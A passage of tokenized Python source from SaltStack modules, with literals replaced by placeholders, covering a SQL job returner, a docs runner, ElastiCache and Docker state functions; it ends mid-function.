'''<STR_LIT>''' <EOL> ret = _format_job_instance ( job ) <EOL> ret . update ( { '<STR_LIT>' : salt . utils . jid . jid_to_time ( jid ) } ) <EOL> return ret <EOL> def _gen_jid ( cur ) : <EOL> '''<STR_LIT>''' <EOL> jid = salt . utils . jid . gen_jid ( ) <EOL> sql = '''<STR_LIT>''' <EOL> cur . 
execute ( sql , ( jid , ) ) <EOL> data = cur . fetchall ( ) <EOL> if not data : <EOL> return jid <EOL> return None <EOL> def prep_jid ( nocache = False , passed_jid = None ) : <EOL> '''<STR_LIT>''' <EOL> conn = _get_conn ( ) <EOL> if conn is None : <EOL> return None <EOL> cur = conn . cursor ( ) <EOL> if passed_jid is None : <EOL> jid = _gen_jid ( cur ) <EOL> else : <EOL> jid = passed_jid <EOL> while not jid : <EOL> log . info ( "<STR_LIT>" ) <EOL> jid = _gen_jid ( cur ) <EOL> cur . close ( ) <EOL> conn . close ( ) <EOL> return jid <EOL> def returner ( load ) : <EOL> '''<STR_LIT>''' <EOL> conn = _get_conn ( ) <EOL> if conn is None : <EOL> return None <EOL> cur = conn . cursor ( ) <EOL> sql = '''<STR_LIT>''' <EOL> cur . execute ( <EOL> sql , ( <EOL> load [ '<STR_LIT>' ] , <EOL> load [ '<STR_LIT>' ] , <EOL> json . dumps ( six . text_type ( str ( load [ '<STR_LIT>' ] ) , '<STR_LIT:utf-8>' , '<STR_LIT:replace>' ) ) , <EOL> load [ '<STR_LIT:id>' ] , <EOL> load . get ( '<STR_LIT:success>' ) , <EOL> ) <EOL> ) <EOL> _close_conn ( conn ) <EOL> def event_return ( events ) : <EOL> '''<STR_LIT>''' <EOL> conn = _get_conn ( ) <EOL> if conn is None : <EOL> return None <EOL> cur = conn . cursor ( ) <EOL> for event in events : <EOL> tag = event . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> data = event . get ( '<STR_LIT:data>' , '<STR_LIT>' ) <EOL> sql = '''<STR_LIT>''' <EOL> cur . execute ( sql , ( tag , json . dumps ( data ) , __opts__ [ '<STR_LIT:id>' ] ) ) <EOL> _close_conn ( conn ) <EOL> def save_load ( jid , clear_load ) : <EOL> '''<STR_LIT>''' <EOL> jid = _escape_jid ( jid ) <EOL> conn = _get_conn ( ) <EOL> if conn is None : <EOL> return None <EOL> cur = conn . cursor ( ) <EOL> sql = '''<STR_LIT>''' '''<STR_LIT>''' '''<STR_LIT>''' '''<STR_LIT>''' <EOL> cur . execute ( <EOL> sql , ( <EOL> jid , <EOL> salt . utils . jid . jid_to_time ( jid ) , <EOL> str ( clear_load . get ( "<STR_LIT>" ) ) , <EOL> str ( clear_load . get ( "<STR_LIT>" ) ) , <EOL> str ( clear_load . 
get ( "<STR_LIT>" ) ) , <EOL> str ( clear_load . get ( "<STR_LIT>" ) ) , <EOL> str ( clear_load . get ( "<STR_LIT>" ) ) , <EOL> str ( clear_load . get ( "<STR_LIT:user>" ) ) , <EOL> str ( json . dumps ( clear_load . get ( "<STR_LIT>" ) ) ) , <EOL> str ( clear_load . get ( "<STR_LIT>" ) ) , <EOL> ) <EOL> ) <EOL> _close_conn ( conn ) <EOL> def save_minions ( jid , minions ) : <EOL> '''<STR_LIT>''' <EOL> pass <EOL> def _escape_jid ( jid ) : <EOL> '''<STR_LIT>''' <EOL> jid = str ( jid ) <EOL> jid = re . sub ( r"<STR_LIT>" , "<STR_LIT>" , jid ) <EOL> return jid <EOL> def _build_dict ( data ) : <EOL> '''<STR_LIT>''' <EOL> result = { } <EOL> result [ "<STR_LIT>" ] = data [ <NUM_LIT:0> ] <EOL> result [ "<STR_LIT>" ] = data [ <NUM_LIT:1> ] <EOL> result [ "<STR_LIT>" ] = data [ <NUM_LIT:2> ] <EOL> result [ "<STR_LIT>" ] = data [ <NUM_LIT:3> ] <EOL> result [ "<STR_LIT>" ] = data [ <NUM_LIT:4> ] <EOL> result [ "<STR_LIT>" ] = data [ <NUM_LIT:5> ] <EOL> result [ "<STR_LIT:user>" ] = data [ <NUM_LIT:6> ] <EOL> result [ "<STR_LIT>" ] = data [ <NUM_LIT:7> ] <EOL> result [ "<STR_LIT>" ] = data [ <NUM_LIT:8> ] <EOL> return result <EOL> def get_load ( jid ) : <EOL> '''<STR_LIT>''' <EOL> jid = _escape_jid ( jid ) <EOL> conn = _get_conn ( ) <EOL> if conn is None : <EOL> return None <EOL> cur = conn . cursor ( ) <EOL> sql = '''<STR_LIT>''' '''<STR_LIT>''' <EOL> cur . execute ( sql , ( jid , ) ) <EOL> data = cur . fetchone ( ) <EOL> if data : <EOL> return _build_dict ( data ) <EOL> _close_conn ( conn ) <EOL> return { } <EOL> def get_jid ( jid ) : <EOL> '''<STR_LIT>''' <EOL> jid = _escape_jid ( jid ) <EOL> conn = _get_conn ( ) <EOL> if conn is None : <EOL> return None <EOL> cur = conn . cursor ( ) <EOL> sql = '''<STR_LIT>''' <EOL> cur . execute ( sql , ( jid , ) ) <EOL> data = cur . fetchall ( ) <EOL> ret = { } <EOL> if data : <EOL> for minion , full_ret in data : <EOL> ret [ minion ] = { } <EOL> ret [ minion ] [ '<STR_LIT>' ] = json . 
loads ( full_ret ) <EOL> _close_conn ( conn ) <EOL> return ret <EOL> def get_jids ( ) : <EOL> '''<STR_LIT>''' <EOL> conn = _get_conn ( ) <EOL> cur = conn . cursor ( ) <EOL> sql = '''<STR_LIT>''' '''<STR_LIT>''' '''<STR_LIT>''' <EOL> if __opts__ [ '<STR_LIT>' ] != <NUM_LIT:0> : <EOL> sql = sql + "<STR_LIT>" + str ( __opts__ [ '<STR_LIT>' ] ) + "<STR_LIT>" <EOL> cur . execute ( sql ) <EOL> ret = { } <EOL> data = cur . fetchone ( ) <EOL> while data : <EOL> data_dict = _build_dict ( data ) <EOL> ret [ data_dict [ "<STR_LIT>" ] ] = _format_jid_instance ( data_dict [ "<STR_LIT>" ] , data_dict ) <EOL> data = cur . fetchone ( ) <EOL> cur . close ( ) <EOL> conn . close ( ) <EOL> return ret <EOL> def clean_old_jobs ( ) : <EOL> '''<STR_LIT>''' <EOL> return </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import , print_function <EOL> import itertools <EOL> import salt . client <EOL> import salt . runner <EOL> import salt . wheel <EOL> import salt . ext . six as six <EOL> from salt . exceptions import SaltClientError <EOL> def __virtual__ ( ) : <EOL> '''<STR_LIT>''' <EOL> return True <EOL> def runner ( ) : <EOL> '''<STR_LIT>''' <EOL> client = salt . runner . RunnerClient ( __opts__ ) <EOL> ret = client . get_docs ( ) <EOL> return ret <EOL> def wheel ( ) : <EOL> '''<STR_LIT>''' <EOL> client = salt . wheel . Wheel ( __opts__ ) <EOL> ret = client . get_docs ( ) <EOL> return ret <EOL> def execution ( ) : <EOL> '''<STR_LIT>''' <EOL> client = salt . client . get_local_client ( __opts__ [ '<STR_LIT>' ] ) <EOL> docs = { } <EOL> try : <EOL> for ret in client . cmd_iter ( '<STR_LIT:*>' , '<STR_LIT>' , timeout = __opts__ [ '<STR_LIT>' ] ) : <EOL> for v in six . itervalues ( ret ) : <EOL> docs . update ( v ) <EOL> except SaltClientError as exc : <EOL> print ( exc ) <EOL> return [ ] <EOL> i = itertools . chain . from_iterable ( [ six . iteritems ( docs [ '<STR_LIT>' ] ) ] ) <EOL> ret = dict ( list ( i ) ) <EOL> return ret </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import print_function <EOL> from __future__ import absolute_import <EOL> import salt . utils . thin <EOL> def generate ( extra_mods = '<STR_LIT>' , overwrite = False , so_mods = '<STR_LIT>' , <EOL> python2_bin = '<STR_LIT>' , python3_bin = '<STR_LIT>' ) : <EOL> '''<STR_LIT>''' <EOL> return salt . utils . thin . gen_thin ( __opts__ [ '<STR_LIT>' ] , <EOL> extra_mods , <EOL> overwrite , <EOL> so_mods , <EOL> python2_bin , <EOL> python3_bin ) <EOL> def generate_min ( extra_mods = '<STR_LIT>' , overwrite = False , so_mods = '<STR_LIT>' , <EOL> python2_bin = '<STR_LIT>' , python3_bin = '<STR_LIT>' ) : <EOL> '''<STR_LIT>''' <EOL> return salt . utils . thin . gen_min ( __opts__ [ '<STR_LIT>' ] , <EOL> extra_mods , <EOL> overwrite , <EOL> so_mods , <EOL> python2_bin , <EOL> python3_bin ) </s>
<s> '''<STR_LIT>''' </s>
<s> '''<STR_LIT>''' <EOL> def __virtual__ ( ) : <EOL> '''<STR_LIT>''' <EOL> if '<STR_LIT>' in __salt__ : <EOL> return '<STR_LIT>' <EOL> else : <EOL> return False <EOL> def present ( <EOL> name , <EOL> engine = None , <EOL> cache_node_type = None , <EOL> num_cache_nodes = None , <EOL> preferred_availability_zone = None , <EOL> port = None , <EOL> cache_parameter_group_name = None , <EOL> cache_security_group_names = None , <EOL> replication_group_id = None , <EOL> auto_minor_version_upgrade = True , <EOL> security_group_ids = None , <EOL> cache_subnet_group_name = None , <EOL> engine_version = None , <EOL> notification_topic_arn = None , <EOL> preferred_maintenance_window = None , <EOL> wait = None , <EOL> region = None , <EOL> key = None , <EOL> keyid = None , <EOL> profile = None ) : <EOL> '''<STR_LIT>''' <EOL> ret = { '<STR_LIT:name>' : name , '<STR_LIT:result>' : True , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : { } } <EOL> if cache_security_group_names and cache_subnet_group_name : <EOL> _subnet_group = __salt__ [ '<STR_LIT>' ] ( <EOL> cache_subnet_group_name , region , key , keyid , profile <EOL> ) <EOL> vpc_id = _subnet_group [ '<STR_LIT>' ] <EOL> if not security_group_ids : <EOL> security_group_ids = [ ] <EOL> _security_group_ids = __salt__ [ '<STR_LIT>' ] ( <EOL> cache_security_group_names , vpc_id , region , key , keyid , profile <EOL> ) <EOL> security_group_ids . extend ( _security_group_ids ) <EOL> cache_security_group_names = None <EOL> config = __salt__ [ '<STR_LIT>' ] ( name , region , key , keyid , <EOL> profile ) <EOL> if config is None : <EOL> msg = '<STR_LIT>' <EOL> ret [ '<STR_LIT>' ] = msg <EOL> ret [ '<STR_LIT:result>' ] = None <EOL> return ret <EOL> elif not config : <EOL> if __opts__ [ '<STR_LIT:test>' ] : <EOL> msg = '<STR_LIT>' . 
format ( name ) <EOL> ret [ '<STR_LIT>' ] = msg <EOL> ret [ '<STR_LIT:result>' ] = None <EOL> return ret <EOL> created = __salt__ [ '<STR_LIT>' ] ( <EOL> name = name , num_cache_nodes = num_cache_nodes , <EOL> cache_node_type = cache_node_type , engine = engine , <EOL> replication_group_id = replication_group_id , <EOL> engine_version = engine_version , <EOL> cache_parameter_group_name = cache_parameter_group_name , <EOL> cache_subnet_group_name = cache_subnet_group_name , <EOL> cache_security_group_names = cache_security_group_names , <EOL> security_group_ids = security_group_ids , <EOL> preferred_availability_zone = preferred_availability_zone , <EOL> preferred_maintenance_window = preferred_maintenance_window , <EOL> port = port , notification_topic_arn = notification_topic_arn , <EOL> auto_minor_version_upgrade = auto_minor_version_upgrade , <EOL> wait = wait , region = region , key = key , keyid = keyid , profile = profile ) <EOL> if created : <EOL> ret [ '<STR_LIT>' ] [ '<STR_LIT>' ] = None <EOL> config = __salt__ [ '<STR_LIT>' ] ( name , region , key , <EOL> keyid , profile ) <EOL> ret [ '<STR_LIT>' ] [ '<STR_LIT>' ] = config <EOL> else : <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> return ret <EOL> else : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> return ret <EOL> def subnet_group_present ( name , subnet_ids , description , tags = None , region = None , <EOL> key = None , keyid = None , profile = None ) : <EOL> '''<STR_LIT>''' <EOL> ret = { '<STR_LIT:name>' : name , <EOL> '<STR_LIT:result>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { } <EOL> } <EOL> exists = __salt__ [ '<STR_LIT>' ] ( name = name , tags = tags , region = region , key = key , <EOL> keyid = keyid , profile = profile ) <EOL> if not exists : <EOL> if __opts__ [ '<STR_LIT:test>' ] : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . 
format ( name ) <EOL> ret [ '<STR_LIT:result>' ] = None <EOL> return ret <EOL> created = __salt__ [ '<STR_LIT>' ] ( name = name , subnet_ids = subnet_ids , <EOL> description = description , tags = tags , <EOL> region = region , key = key , keyid = keyid , <EOL> profile = profile ) <EOL> if not created : <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> return ret <EOL> ret [ '<STR_LIT>' ] [ '<STR_LIT>' ] = None <EOL> ret [ '<STR_LIT>' ] [ '<STR_LIT>' ] = name <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> return ret <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> return ret <EOL> def absent ( name , wait = True , region = None , key = None , keyid = None , profile = None ) : <EOL> '''<STR_LIT>''' <EOL> ret = { '<STR_LIT:name>' : name , '<STR_LIT:result>' : True , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : { } } <EOL> is_present = __salt__ [ '<STR_LIT>' ] ( name , region , key , keyid , profile ) <EOL> if is_present : <EOL> if __opts__ [ '<STR_LIT:test>' ] : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> ret [ '<STR_LIT:result>' ] = None <EOL> return ret <EOL> deleted = __salt__ [ '<STR_LIT>' ] ( name , wait , region , key , <EOL> keyid , profile ) <EOL> if deleted : <EOL> ret [ '<STR_LIT>' ] [ '<STR_LIT>' ] = name <EOL> ret [ '<STR_LIT>' ] [ '<STR_LIT>' ] = None <EOL> else : <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> else : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . 
format ( name , region ) <EOL> return ret <EOL> def creategroup ( name , primary_cluster_id , replication_group_description , wait = None , <EOL> region = None , key = None , keyid = None , profile = None ) : <EOL> '''<STR_LIT>''' <EOL> ret = { '<STR_LIT:name>' : name , '<STR_LIT:result>' : None , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : { } } <EOL> is_present = __salt__ [ '<STR_LIT>' ] ( name , region , key , keyid , <EOL> profile ) <EOL> if not is_present : <EOL> if __opts__ [ '<STR_LIT:test>' ] : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( <EOL> name ) <EOL> ret [ '<STR_LIT:result>' ] = None <EOL> created = __salt__ [ '<STR_LIT>' ] ( name , primary_cluster_id , <EOL> replication_group_description , <EOL> wait , region , key , keyid , profile ) <EOL> if created : <EOL> config = __salt__ [ '<STR_LIT>' ] ( name , region , key , keyid , profile ) <EOL> ret [ '<STR_LIT>' ] [ '<STR_LIT>' ] = None <EOL> ret [ '<STR_LIT>' ] [ '<STR_LIT>' ] = config <EOL> ret [ '<STR_LIT:result>' ] = True <EOL> else : <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> else : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> ret [ '<STR_LIT:result>' ] = True <EOL> return ret <EOL> def subnet_group_absent ( name , tags = None , region = None , key = None , keyid = None , profile = None ) : <EOL> ret = { '<STR_LIT:name>' : name , <EOL> '<STR_LIT:result>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { } <EOL> } <EOL> exists = __salt__ [ '<STR_LIT>' ] ( name = name , tags = tags , region = region , key = key , <EOL> keyid = keyid , profile = profile ) <EOL> if not exists : <EOL> ret [ '<STR_LIT:result>' ] = True <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> return ret <EOL> if __opts__ [ '<STR_LIT:test>' ] : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . 
format ( name ) <EOL> ret [ '<STR_LIT:result>' ] = None <EOL> return ret <EOL> deleted = __salt__ [ '<STR_LIT>' ] ( name , region , key , keyid , profile ) <EOL> if not deleted : <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> return ret <EOL> ret [ '<STR_LIT>' ] [ '<STR_LIT>' ] = name <EOL> ret [ '<STR_LIT>' ] [ '<STR_LIT>' ] = None <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> return ret </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import functools <EOL> import logging <EOL> from salt . ext . six import string_types <EOL> import salt . utils <EOL> import salt . ext . six as six <EOL> log = logging . getLogger ( __name__ ) <EOL> __virtualname__ = '<STR_LIT>' <EOL> def __virtual__ ( ) : <EOL> '''<STR_LIT>''' <EOL> if '<STR_LIT>' in __salt__ : <EOL> return __virtualname__ <EOL> return False <EOL> INVALID_RESPONSE = '<STR_LIT>' <EOL> VALID_RESPONSE = '<STR_LIT>' <EOL> NOTSET = object ( ) <EOL> def _ret_status ( exec_status = None , <EOL> name = '<STR_LIT>' , <EOL> comment = '<STR_LIT>' , <EOL> result = None , <EOL> changes = None ) : <EOL> if not changes : <EOL> changes = { } <EOL> if exec_status is None : <EOL> exec_status = { } <EOL> if exec_status : <EOL> if result is None : <EOL> result = exec_status [ '<STR_LIT:status>' ] <EOL> scomment = exec_status . get ( '<STR_LIT>' , None ) <EOL> if scomment : <EOL> comment += '<STR_LIT:\n>' + scomment <EOL> out = exec_status . get ( '<STR_LIT>' , None ) <EOL> if out : <EOL> if isinstance ( out , string_types ) : <EOL> comment += '<STR_LIT:\n>' + out <EOL> return { <EOL> '<STR_LIT>' : changes , <EOL> '<STR_LIT:result>' : result , <EOL> '<STR_LIT:name>' : name , <EOL> '<STR_LIT>' : comment , <EOL> } <EOL> def _valid ( exec_status = None , name = '<STR_LIT>' , comment = '<STR_LIT>' , changes = None ) : <EOL> return _ret_status ( exec_status = exec_status , <EOL> comment = comment , <EOL> name = name , <EOL> changes = changes , <EOL> result = True ) <EOL> def _invalid ( exec_status = None , name = '<STR_LIT>' , comment = '<STR_LIT>' , changes = None ) : <EOL> return _ret_status ( exec_status = exec_status , <EOL> comment = comment , <EOL> name = name , <EOL> changes = changes , <EOL> result = False ) <EOL> def _get_image_name ( image , tag ) : <EOL> if '<STR_LIT::>' not in image : <EOL> return '<STR_LIT::>' . 
join ( ( image , tag ) ) <EOL> return image <EOL> def _parse_volumes ( volumes ) : <EOL> '''<STR_LIT>''' <EOL> log . trace ( "<STR_LIT>" + str ( volumes ) ) <EOL> bindvolumes = { } <EOL> contvolumes = [ ] <EOL> if isinstance ( volumes , dict ) : <EOL> bindvolumes = volumes <EOL> if isinstance ( volumes , list ) : <EOL> for vol in volumes : <EOL> if isinstance ( vol , dict ) : <EOL> for volsource , voldef in vol . items ( ) : <EOL> if isinstance ( voldef , dict ) : <EOL> target = voldef [ '<STR_LIT>' ] <EOL> read_only = voldef . get ( '<STR_LIT>' , False ) <EOL> else : <EOL> target = str ( voldef ) <EOL> read_only = False <EOL> source = volsource <EOL> else : <EOL> if '<STR_LIT::>' in vol : <EOL> volspec = vol . split ( '<STR_LIT::>' ) <EOL> source = volspec [ <NUM_LIT:0> ] <EOL> target = volspec [ <NUM_LIT:1> ] <EOL> read_only = False <EOL> try : <EOL> if len ( volspec ) > <NUM_LIT:2> : <EOL> read_only = volspec [ <NUM_LIT:2> ] == "<STR_LIT>" <EOL> except IndexError : <EOL> pass <EOL> else : <EOL> contvolumes . append ( str ( vol ) ) <EOL> continue <EOL> bindvolumes [ source ] = { <EOL> '<STR_LIT>' : target , <EOL> '<STR_LIT>' : read_only <EOL> } <EOL> result = { '<STR_LIT>' : bindvolumes , '<STR_LIT>' : contvolumes } <EOL> log . 
trace ( "<STR_LIT>" + str ( result ) ) <EOL> return result <EOL> def mod_watch ( name , sfun = None , * args , ** kw ) : <EOL> if sfun == '<STR_LIT>' : <EOL> kw [ '<STR_LIT>' ] = True <EOL> build_status = built ( name , ** kw ) <EOL> result = build_status [ '<STR_LIT:result>' ] <EOL> status = _ret_status ( build_status , name , result = result , <EOL> changes = { name : result } ) <EOL> return status <EOL> elif sfun == '<STR_LIT>' : <EOL> remove_container = __salt__ [ '<STR_LIT>' ] <EOL> remove_status = _ret_status ( remove_container ( container = name , <EOL> force = True ) , <EOL> name = name ) <EOL> installed_status = installed ( name = name , ** kw ) <EOL> result = installed_status [ '<STR_LIT:result>' ] and remove_status [ '<STR_LIT:result>' ] <EOL> comment = remove_status [ '<STR_LIT>' ] <EOL> status = _ret_status ( installed_status , name = name , <EOL> result = result , <EOL> changes = { name : result } , <EOL> comment = comment ) <EOL> return status <EOL> elif sfun == '<STR_LIT>' : <EOL> container = kw . get ( '<STR_LIT>' , name ) <EOL> kill_signal = kw . get ( '<STR_LIT>' ) <EOL> if kill_signal : <EOL> killer = __salt__ [ '<STR_LIT>' ] <EOL> status = _ret_status ( killer ( container , signal = kill_signal ) , <EOL> name = name , <EOL> changes = { name : True } ) <EOL> else : <EOL> restarter = __salt__ [ '<STR_LIT>' ] <EOL> status = _ret_status ( restarter ( container ) , <EOL> name = name , <EOL> changes = { name : True } ) <EOL> return status <EOL> return { '<STR_LIT:name>' : name , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT:result>' : False , <EOL> '<STR_LIT>' : ( '<STR_LIT>' <EOL> '<STR_LIT>' . 
format ( sfun ) ) } <EOL> def pulled ( name , <EOL> tag = '<STR_LIT>' , <EOL> force = False , <EOL> insecure_registry = False , <EOL> * args , <EOL> ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> inspect_image = __salt__ [ '<STR_LIT>' ] <EOL> image_name = _get_image_name ( name , tag ) <EOL> image_infos = inspect_image ( image_name ) <EOL> if image_infos [ '<STR_LIT:status>' ] and not force : <EOL> return _valid ( <EOL> name = name , <EOL> comment = '<STR_LIT>' . format ( image_name ) ) <EOL> if __opts__ [ '<STR_LIT:test>' ] : <EOL> comment = '<STR_LIT>' . format ( image_name ) <EOL> return _ret_status ( name = name , comment = comment ) <EOL> previous_id = image_infos [ '<STR_LIT>' ] [ '<STR_LIT>' ] if image_infos [ '<STR_LIT:status>' ] else None <EOL> pull = __salt__ [ '<STR_LIT>' ] <EOL> returned = pull ( name , tag = tag , insecure_registry = insecure_registry ) <EOL> if previous_id != returned [ '<STR_LIT:id>' ] : <EOL> changes = { name : { '<STR_LIT>' : previous_id , <EOL> '<STR_LIT>' : returned [ '<STR_LIT:id>' ] } } <EOL> comment = '<STR_LIT>' . format ( image_name ) <EOL> else : <EOL> changes = { } <EOL> comment = '<STR_LIT>' <EOL> return _ret_status ( returned , name , changes = changes , comment = comment ) <EOL> def pushed ( name , tag = '<STR_LIT>' , insecure_registry = False ) : <EOL> '''<STR_LIT>''' <EOL> image_name = _get_image_name ( name , tag ) <EOL> if __opts__ [ '<STR_LIT:test>' ] : <EOL> comment = '<STR_LIT>' . format ( image_name ) <EOL> return _ret_status ( name = name , comment = comment ) <EOL> push = __salt__ [ '<STR_LIT>' ] <EOL> returned = push ( name , tag = tag , insecure_registry = insecure_registry ) <EOL> log . 
debug ( "<STR_LIT>" + str ( returned ) ) <EOL> if returned [ '<STR_LIT:status>' ] : <EOL> changes = { name : { '<STR_LIT>' : returned [ '<STR_LIT:id>' ] } } <EOL> else : <EOL> changes = { } <EOL> return _ret_status ( returned , name , changes = changes ) <EOL> def loaded ( name , tag = '<STR_LIT>' , source = None , source_hash = '<STR_LIT>' , force = False ) : <EOL> '''<STR_LIT>''' <EOL> inspect_image = __salt__ [ '<STR_LIT>' ] <EOL> image_name = _get_image_name ( name , tag ) <EOL> image_infos = inspect_image ( image_name ) <EOL> if image_infos [ '<STR_LIT:status>' ] and not force : <EOL> return _valid ( <EOL> name = name , <EOL> comment = '<STR_LIT>' . format ( image_name ) ) <EOL> if __opts__ [ '<STR_LIT:test>' ] : <EOL> comment = '<STR_LIT>' . format ( image_name ) <EOL> return _ret_status ( name = name , comment = comment ) <EOL> tmp_filename = salt . utils . mkstemp ( ) <EOL> __salt__ [ '<STR_LIT>' ] ( '<STR_LIT>' , <EOL> name = tmp_filename , <EOL> source = source , <EOL> source_hash = source_hash ) <EOL> changes = { } <EOL> if image_infos [ '<STR_LIT:status>' ] : <EOL> changes [ '<STR_LIT>' ] = image_infos [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> remove_image = __salt__ [ '<STR_LIT>' ] <EOL> remove_info = remove_image ( image_name ) <EOL> if not remove_info [ '<STR_LIT:status>' ] : <EOL> return _invalid ( name = name , <EOL> comment = '<STR_LIT>' . format ( name ) ) <EOL> load = __salt__ [ '<STR_LIT>' ] <EOL> returned = load ( tmp_filename ) <EOL> image_infos = inspect_image ( image_name ) <EOL> if image_infos [ '<STR_LIT:status>' ] : <EOL> changes [ '<STR_LIT>' ] = image_infos [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> else : <EOL> return _invalid ( <EOL> name = name , <EOL> comment = '<STR_LIT>' . 
format ( image_name ) ) <EOL> return _ret_status ( returned , name , changes = changes ) <EOL> def built ( name , <EOL> tag = '<STR_LIT>' , <EOL> path = None , <EOL> quiet = False , <EOL> nocache = False , <EOL> rm = True , <EOL> force = False , <EOL> timeout = None , <EOL> * args , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> inspect_image = __salt__ [ '<STR_LIT>' ] <EOL> image_name = _get_image_name ( name , tag ) <EOL> image_infos = inspect_image ( image_name ) <EOL> if image_infos [ '<STR_LIT:status>' ] and not force : <EOL> return _valid ( <EOL> name = name , <EOL> comment = '<STR_LIT>' . format ( <EOL> image_name , image_infos [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) ) <EOL> if __opts__ [ '<STR_LIT:test>' ] : <EOL> comment = '<STR_LIT>' . format ( image_name ) <EOL> return { '<STR_LIT:name>' : name , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT:result>' : None , <EOL> '<STR_LIT>' : comment } <EOL> previous_id = image_infos [ '<STR_LIT>' ] [ '<STR_LIT>' ] if image_infos [ '<STR_LIT:status>' ] else None <EOL> build = __salt__ [ '<STR_LIT>' ] <EOL> kw = dict ( tag = image_name , <EOL> path = path , <EOL> quiet = quiet , <EOL> nocache = nocache , <EOL> rm = rm , <EOL> timeout = timeout , <EOL> ) <EOL> returned = build ( ** kw ) <EOL> if previous_id != returned [ '<STR_LIT:id>' ] : <EOL> changes = { name : { '<STR_LIT>' : previous_id , <EOL> '<STR_LIT>' : returned [ '<STR_LIT:id>' ] } } <EOL> comment = '<STR_LIT>' . 
format ( image_name ) <EOL> else : <EOL> changes = { } <EOL> comment = '<STR_LIT>' <EOL> return _ret_status ( exec_status = returned , <EOL> name = name , <EOL> changes = changes , <EOL> comment = comment ) <EOL> def installed ( name , <EOL> image , <EOL> tag = '<STR_LIT>' , <EOL> command = None , <EOL> hostname = None , <EOL> user = None , <EOL> detach = True , <EOL> stdin_open = False , <EOL> tty = False , <EOL> mem_limit = None , <EOL> ports = None , <EOL> environment = None , <EOL> dns = None , <EOL> volumes = None , <EOL> volumes_from = None , <EOL> cpu_shares = None , <EOL> cpuset = None , <EOL> * args , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> ins_image = __salt__ [ '<STR_LIT>' ] <EOL> ins_container = __salt__ [ '<STR_LIT>' ] <EOL> create = __salt__ [ '<STR_LIT>' ] <EOL> image_name = _get_image_name ( image , tag ) <EOL> iinfos = ins_image ( image_name ) <EOL> if not iinfos [ '<STR_LIT:status>' ] : <EOL> return _invalid ( comment = '<STR_LIT>' . format ( image_name ) ) <EOL> cinfos = ins_container ( name ) <EOL> already_exists = cinfos [ '<STR_LIT:status>' ] <EOL> if already_exists : <EOL> return _valid ( comment = '<STR_LIT>' . format ( name ) ) <EOL> dports , denvironment = { } , { } <EOL> if __opts__ [ '<STR_LIT:test>' ] : <EOL> comment = '<STR_LIT>' . format ( name ) <EOL> return _ret_status ( name = name , comment = comment ) <EOL> if not ports : <EOL> ports = [ ] <EOL> if not volumes : <EOL> volumes = [ ] <EOL> if isinstance ( environment , dict ) : <EOL> for k in environment : <EOL> denvironment [ six . text_type ( k ) ] = six . text_type ( environment [ k ] ) <EOL> if isinstance ( environment , list ) : <EOL> for p in environment : <EOL> if isinstance ( p , dict ) : <EOL> for k in p : <EOL> denvironment [ six . text_type ( k ) ] = six . 
text_type ( p [ k ] ) <EOL> for p in ports : <EOL> if not isinstance ( p , dict ) : <EOL> dports [ str ( p ) ] = { } <EOL> else : <EOL> for k in p : <EOL> dports [ str ( p ) ] = { } <EOL> parsed_volumes = _parse_volumes ( volumes ) <EOL> bindvolumes = parsed_volumes [ '<STR_LIT>' ] <EOL> contvolumes = parsed_volumes [ '<STR_LIT>' ] <EOL> kw = dict ( <EOL> binds = bindvolumes , <EOL> command = command , <EOL> hostname = hostname , <EOL> user = user , <EOL> detach = detach , <EOL> stdin_open = stdin_open , <EOL> tty = tty , <EOL> mem_limit = mem_limit , <EOL> ports = dports , <EOL> environment = denvironment , <EOL> dns = dns , <EOL> volumes = contvolumes , <EOL> volumes_from = volumes_from , <EOL> name = name , <EOL> cpu_shares = cpu_shares , <EOL> cpuset = cpuset ) <EOL> out = create ( image_name , ** kw ) <EOL> changes = '<STR_LIT>' <EOL> try : <EOL> cid = out [ '<STR_LIT>' ] [ '<STR_LIT:info>' ] [ '<STR_LIT:id>' ] <EOL> except Exception as e : <EOL> log . debug ( str ( e ) ) <EOL> else : <EOL> changes = '<STR_LIT>' . format ( cid ) <EOL> out [ '<STR_LIT>' ] = changes <EOL> ret = 